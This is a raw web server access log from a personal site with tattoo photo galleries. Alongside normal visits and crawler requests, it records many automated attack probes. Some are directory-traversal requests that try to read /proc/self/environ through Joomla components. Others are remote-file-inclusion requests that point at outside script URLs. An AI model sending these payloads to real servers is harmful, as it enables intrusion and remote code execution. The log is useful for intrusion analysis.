195.93.149.1 - - [29/Jun/2010:03:27:43 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.108.64.192 - - [29/Jun/2010:03:36:33 -0500] "GET /logs/access_log.1275782400//uigaproxy/include/template.php?content=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
89.108.64.192 - - [29/Jun/2010:03:36:33 -0500] "GET //uigaproxy/include/template.php?content=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.812"
89.108.64.192 - - [29/Jun/2010:03:36:34 -0500] "GET /logs//uigaproxy/include/template.php?content=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
89.108.64.192 - - [29/Jun/2010:03:36:35 -0500] "GET /logs/access_log.1276819200//uigaproxy/include/template.php?content=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
84.243.214.52 - - [29/Jun/2010:03:37:33 -0500] "GET /logs/access_log.1276041600//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
203.120.246.20 - - [29/Jun/2010:03:38:58 -0500] "GET /logs/access_log.1274054400/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:03:38:59 -0500] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
203.120.246.20 - - [29/Jun/2010:03:38:59 -0500] "GET /logs/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
121.78.118.123 - - [29/Jun/2010:04:00:35 -0500] "GET /logs/access_log.1274054400//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
121.78.118.123 - - [29/Jun/2010:04:00:36 -0500] "GET //index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
121.78.118.123 - - [29/Jun/2010:04:00:36 -0500] "GET /logs//index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [29/Jun/2010:04:01:35 -0500] "GET /logs/access_log.1188518400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.231.187.33 - - [29/Jun/2010:04:01:43 -0500] "GET /logs/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
193.231.187.33 - - [29/Jun/2010:04:01:43 -0500] "GET /logs/access_log.1277164800/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.810"
193.231.187.33 - - [29/Jun/2010:04:01:43 -0500] "GET /language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.810"
208.115.111.248 - - [29/Jun/2010:04:02:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
204.10.38.244 - - [29/Jun/2010:04:04:18 -0500] "GET /logs/access_log.1276646400%20%20///index.php?option=com_fabrik&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 324 "-""dex Bot Search"
204.10.38.244 - - [29/Jun/2010:04:04:18 -0500] "GET /logs///index.php?option=com_fabrik&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 300 "-""dex Bot Search"
204.10.38.244 - - [29/Jun/2010:04:04:18 -0500] "GET ///index.php?option=com_fabrik&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 295 "-""dex Bot Search"
99.7.55.150 - - [29/Jun/2010:04:06:32 -0500] "GET /logs///index.php?option=com_fabrik&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 300 "-""dex Bot Search"
99.7.55.150 - - [29/Jun/2010:04:06:32 -0500] "GET /logs/access_log.1276646400%20%20///index.php?option=com_fabrik&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 324 "-""dex Bot Search"
99.7.55.150 - - [29/Jun/2010:04:06:37 -0500] "GET ///index.php?option=com_fabrik&controller=http://www.lagacetaonline.net/archivo/Ckrid1.txt?? HTTP/1.1" 404 295 "-""dex Bot Search"
79.28.82.140 - - [29/Jun/2010:04:13:59 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.it/url?q=http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:13:59 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:05 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:05 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:05 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:05 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:06 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:06 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:06 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:07 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:07 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:07 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:07 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:24 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:24 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:24 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:24 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:25 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:25 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:25 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:25 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:26 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:26 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:26 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
94.124.120.23 - - [29/Jun/2010:04:14:29 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.124.120.23 - - [29/Jun/2010:04:14:29 -0500] "GET /logs/access_log.1266710400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
94.124.120.23 - - [29/Jun/2010:04:14:29 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
94.124.120.23 - - [29/Jun/2010:04:14:31 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
94.124.120.23 - - [29/Jun/2010:04:14:31 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.124.120.23 - - [29/Jun/2010:04:14:31 -0500] "GET /logs/access_log.1266710400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
79.28.82.140 - - [29/Jun/2010:04:14:48 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:48 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:48 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:49 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:49 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:49 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:50 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:50 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:50 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:50 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:14:50 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:01 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:01 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:01 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:02 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:02 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:02 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:02 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:02 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:03 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:03 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:03 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:10 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:10 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:10 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
79.28.82.140 - - [29/Jun/2010:04:15:11 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
67.195.112.180 - - [29/Jun/2010:04:20:33 -0500] "GET /logs/access_log.1219363200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.252.241 - - [29/Jun/2010:04:20:55 -0500] "GET /costume HTTP/1.1" 301 331 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
87.250.252.241 - - [29/Jun/2010:04:20:56 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
216.120.237.104 - - [29/Jun/2010:04:24:58 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:24:59 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:25:10 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:25:10 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:25:23 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:25:35 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:26:21 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
186.28.232.13 - - [29/Jun/2010:04:26:27 -0500] "GET /logs/access_log.1277164800//?option=com_typedcontent&Itemid=25&mosConfig_absolute_path=http://www.systemediffusion.com/v2/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
186.28.232.13 - - [29/Jun/2010:04:26:27 -0500] "GET //?option=com_typedcontent&Itemid=25&mosConfig_absolute_path=http://www.systemediffusion.com/v2/id.txt?? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
186.28.232.13 - - [29/Jun/2010:04:26:27 -0500] "GET /logs//?option=com_typedcontent&Itemid=25&mosConfig_absolute_path=http://www.systemediffusion.com/v2/id.txt?? HTTP/1.1" 200 11365 "-""libwww-perl/5.805"
216.120.237.104 - - [29/Jun/2010:04:26:30 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:26:31 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
91.142.214.148 - - [29/Jun/2010:04:26:46 -0500] "GET /logs/access_log.1277164800//?option=com_typedcontent&Itemid=25&mosConfig_absolute_path=http://digenni.com/cms/cache/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
91.142.214.148 - - [29/Jun/2010:04:26:47 -0500] "GET //?option=com_typedcontent&Itemid=25&mosConfig_absolute_path=http://digenni.com/cms/cache/id.txt?? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
91.142.214.148 - - [29/Jun/2010:04:26:47 -0500] "GET /logs//?option=com_typedcontent&Itemid=25&mosConfig_absolute_path=http://digenni.com/cms/cache/id.txt?? HTTP/1.1" 200 11365 "-""libwww-perl/5.805"
216.120.237.104 - - [29/Jun/2010:04:26:57 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:26:59 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:27:16 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:27:17 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:27:28 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:27:41 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:27:46 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:27:52 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:28:10 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:28:45 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:28:45 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:28:45 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:28:47 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:28:49 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:29:02 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:29:22 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:29:22 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:29:22 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11365 "-""libwww-perl/5.831"
79.175.165.14 - - [29/Jun/2010:04:29:29 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
79.175.165.14 - - [29/Jun/2010:04:29:40 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.120.237.104 - - [29/Jun/2010:04:29:42 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:29:43 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:29:43 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:30:02 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:30:02 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:30:02 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
216.120.237.104 - - [29/Jun/2010:04:30:48 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
79.175.165.14 - - [29/Jun/2010:04:30:59 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
79.175.165.14 - - [29/Jun/2010:04:31:31 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.120.237.104 - - [29/Jun/2010:04:31:37 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
79.175.165.14 - - [29/Jun/2010:04:31:47 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.120.237.104 - - [29/Jun/2010:04:31:53 -0500] "GET /logs/access_log.1277164800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
213.171.37.206 - - [29/Jun/2010:04:31:59 -0500] "GET /logs/language/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
